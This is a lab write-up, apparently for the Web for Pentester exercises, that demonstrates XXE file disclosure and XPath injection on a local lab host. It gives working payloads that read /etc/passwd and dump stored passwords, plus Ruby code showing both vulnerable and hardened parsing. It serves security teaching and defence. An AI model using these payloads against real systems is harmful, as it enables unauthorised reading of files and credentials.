Web for pentester writeup: XML attacks

    XML attacks

    Example 1 - XML External Entity injection (XXE)

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181259909-649426507.png)

    Payload (the & of the entity reference is sent as %26: left raw, the query-string parser would treat it as a parameter separator and the reference &b; would never reach the XML parser):
    http://192.168.219.136/xml/example1.php?xml= <!DOCTYPE a[<!ENTITY b SYSTEM "file:///etc/passwd">]><c>%26b;</c>

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181311103-20902236.png)
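The payload above, as an added example that is not part of the writeup: a Ruby script that builds the Example 1 request with the entity reference correctly percent-encoded, and the parser-side gate (refuse any DTD before parsing) that closes the hole. The host, path and xml parameter come from the writeup's URL; the REXML parse only shows the gate, it is not what example1.php runs.

```ruby
require "uri"
require "rexml/document"

# Target taken from the writeup's URL.
TARGET = "http://192.168.219.136/xml/example1.php"

# XXE document for an arbitrary file. The entity reference &b; is kept raw
# here; encoding happens once, when the document is placed in the query string.
def xxe_document(path)
  %(<!DOCTYPE a [<!ENTITY b SYSTEM "file://#{path}">]><c>&b;</c>)
end

# Full request URL. encode_www_form_component turns & into %26 (and ; into
# %3B), so the server's query parser hands the whole document to the xml
# parameter instead of splitting it at the &.
def xxe_url(path)
  "#{TARGET}?xml=#{URI.encode_www_form_component(xxe_document(path))}"
end

# Server side: the cheapest fix is to refuse any document carrying a DTD,
# because every entity declaration (internal, SYSTEM or PUBLIC) lives in one.
DTD_MARKERS = /<!(?:DOCTYPE|ENTITY)\b/i

def dtd_free?(xml)
  !xml.match?(DTD_MARKERS)
end

# Parse only DTD-free input and return the text of the root element.
def parse_untrusted(xml)
  raise ArgumentError, "DTD not allowed in untrusted XML" unless dtd_free?(xml)
  REXML::Document.new(xml).root.text
end

if __FILE__ == $0
  puts xxe_url("/etc/passwd")
  puts parse_untrusted("<c>hello</c>")
  begin
    parse_untrusted(xxe_document("/etc/passwd"))
  rescue ArgumentError => e
    puts "rejected: #{e.message}"
  end
end
```

Refusing DTDs outright is the right default for input such as this form field; if a DTD is genuinely needed, disable external entity resolution in the parser instead.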

    Example 2 - XPath injection

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181319011-891038369.png)
    Entering a single quote causes an error, and the error message shows an XPath function being called, so this is probably XPath injection. Four true/false probes confirm it:

    <1> http://192.168.219.136/xml/example2.php?name=hacker' and '1' ='1
    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181324774-2007834750.png)

    <2> http://192.168.219.136/xml/example2.php?name=hacker' and '1' ='2

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181330451-1657338604.png)

    <3> http://192.168.219.136/xml/example2.php?name=hacker' or '1' ='1

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181337206-2047698607.png)

    <4> http://192.168.219.136/xml/example2.php?name=hacker' or '1' ='2

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181441610-362099624.png)

    The responses track the truth value of the injected condition, so the input lands inside a quoted string comparison in a predicate and the XPath expression has the form [PARENT NODES]/name[.='[INPUT]']/[CHILD NODES]

    Payload: the ' closes the string and ] closes the predicate, 1=1 makes the predicate match every name node, parent::*/child::node() steps up to the parent node and dumps all of its children, and the trailing %00 cuts off the remainder of the original expression (PHP hands the expression to libxml as a NUL-terminated C string, so nothing after the null byte is parsed):
    http://192.168.219.136/xml/example2.php?name=' or 1=1]/parent::*/child::node()%00

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181446807-1802045137.png)

    The same structure, selecting only the password child of every parent node:
    http://192.168.219.136/xml/example2.php?name=hacker' or 1=1]/parent::*/password%00

    ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181450842-1008994050.png)
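The probes and payloads of Example 2, reproduced as an added example that is not the writeup's code and not example2.php: a constructed user store in the shape the writeup infers (parent node user, children name, password and message; all element names are assumptions), the vulnerable string-spliced lookup, and a hardened lookup that builds the XPath literal with concat() so no quote in the input can close it. Ruby strings are binary-safe, so the libxml null-byte truncation the %00 relies on is emulated explicitly.

```ruby
require "rexml/document"

# Constructed sample data, laid out as [PARENT NODES]/name[.='[INPUT]']/[CHILD NODES].
USERS_XML = <<~XML
  <users>
    <user><name>hacker</name><password>s3cret</password><message>Hello hacker</message></user>
    <user><name>admin</name><password>adminpass</password><message>Hello admin</message></user>
  </users>
XML

def users
  REXML::Document.new(USERS_XML)
end

# Vulnerable lookup: the name is spliced straight into the expression, as
# example2.php evidently does. PHP passes the expression to libxml as a
# NUL-terminated C string, so everything after %00 is dropped; split("\0")
# emulates that here because REXML would otherwise see the whole string.
def lookup_vulnerable(name)
  xpath = "/users/user/name[.='#{name}']/parent::*/message"
  xpath = xpath.split("\0", 2).first
  REXML::XPath.match(users, xpath).map(&:text)
end

# XPath 1.0 has no escape sequence inside a string literal. A value with only
# one kind of quote is wrapped in the other kind; a value containing both is
# assembled with concat(), so nothing the user sends can close the literal.
def xpath_literal(value)
  return "'#{value}'" unless value.include?("'")
  return "\"#{value}\"" unless value.include?('"')
  parts = value.split("'", -1).map { |p| "'#{p}'" }
  "concat(#{parts.join(", \"'\", ")})"
end

# Hardened lookup: same expression shape, safely quoted input.
def lookup_safe(name)
  xpath = "/users/user/name[.=#{xpath_literal(name)}]/parent::*/message"
  REXML::XPath.match(users, xpath).map(&:text)
end

if __FILE__ == $0
  ["hacker", "hacker' and '1'='2", "hacker' or '1'='1",
   "' or 1=1]/parent::*/password\0"].each do |input|
    puts "#{input.inspect} => #{lookup_vulnerable(input).inspect}"
  end
  puts "safe: #{lookup_safe("hacker' or '1'='1").inspect}"
end
```

The third probe returns every user's message and the null-byte payload returns every password, exactly the two escalations the writeup's screenshots show; against lookup_safe the same inputs are searched for literally and match nothing.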
    Original article: https://www.cnblogs.com/liliyuanshangcao/p/11322907.html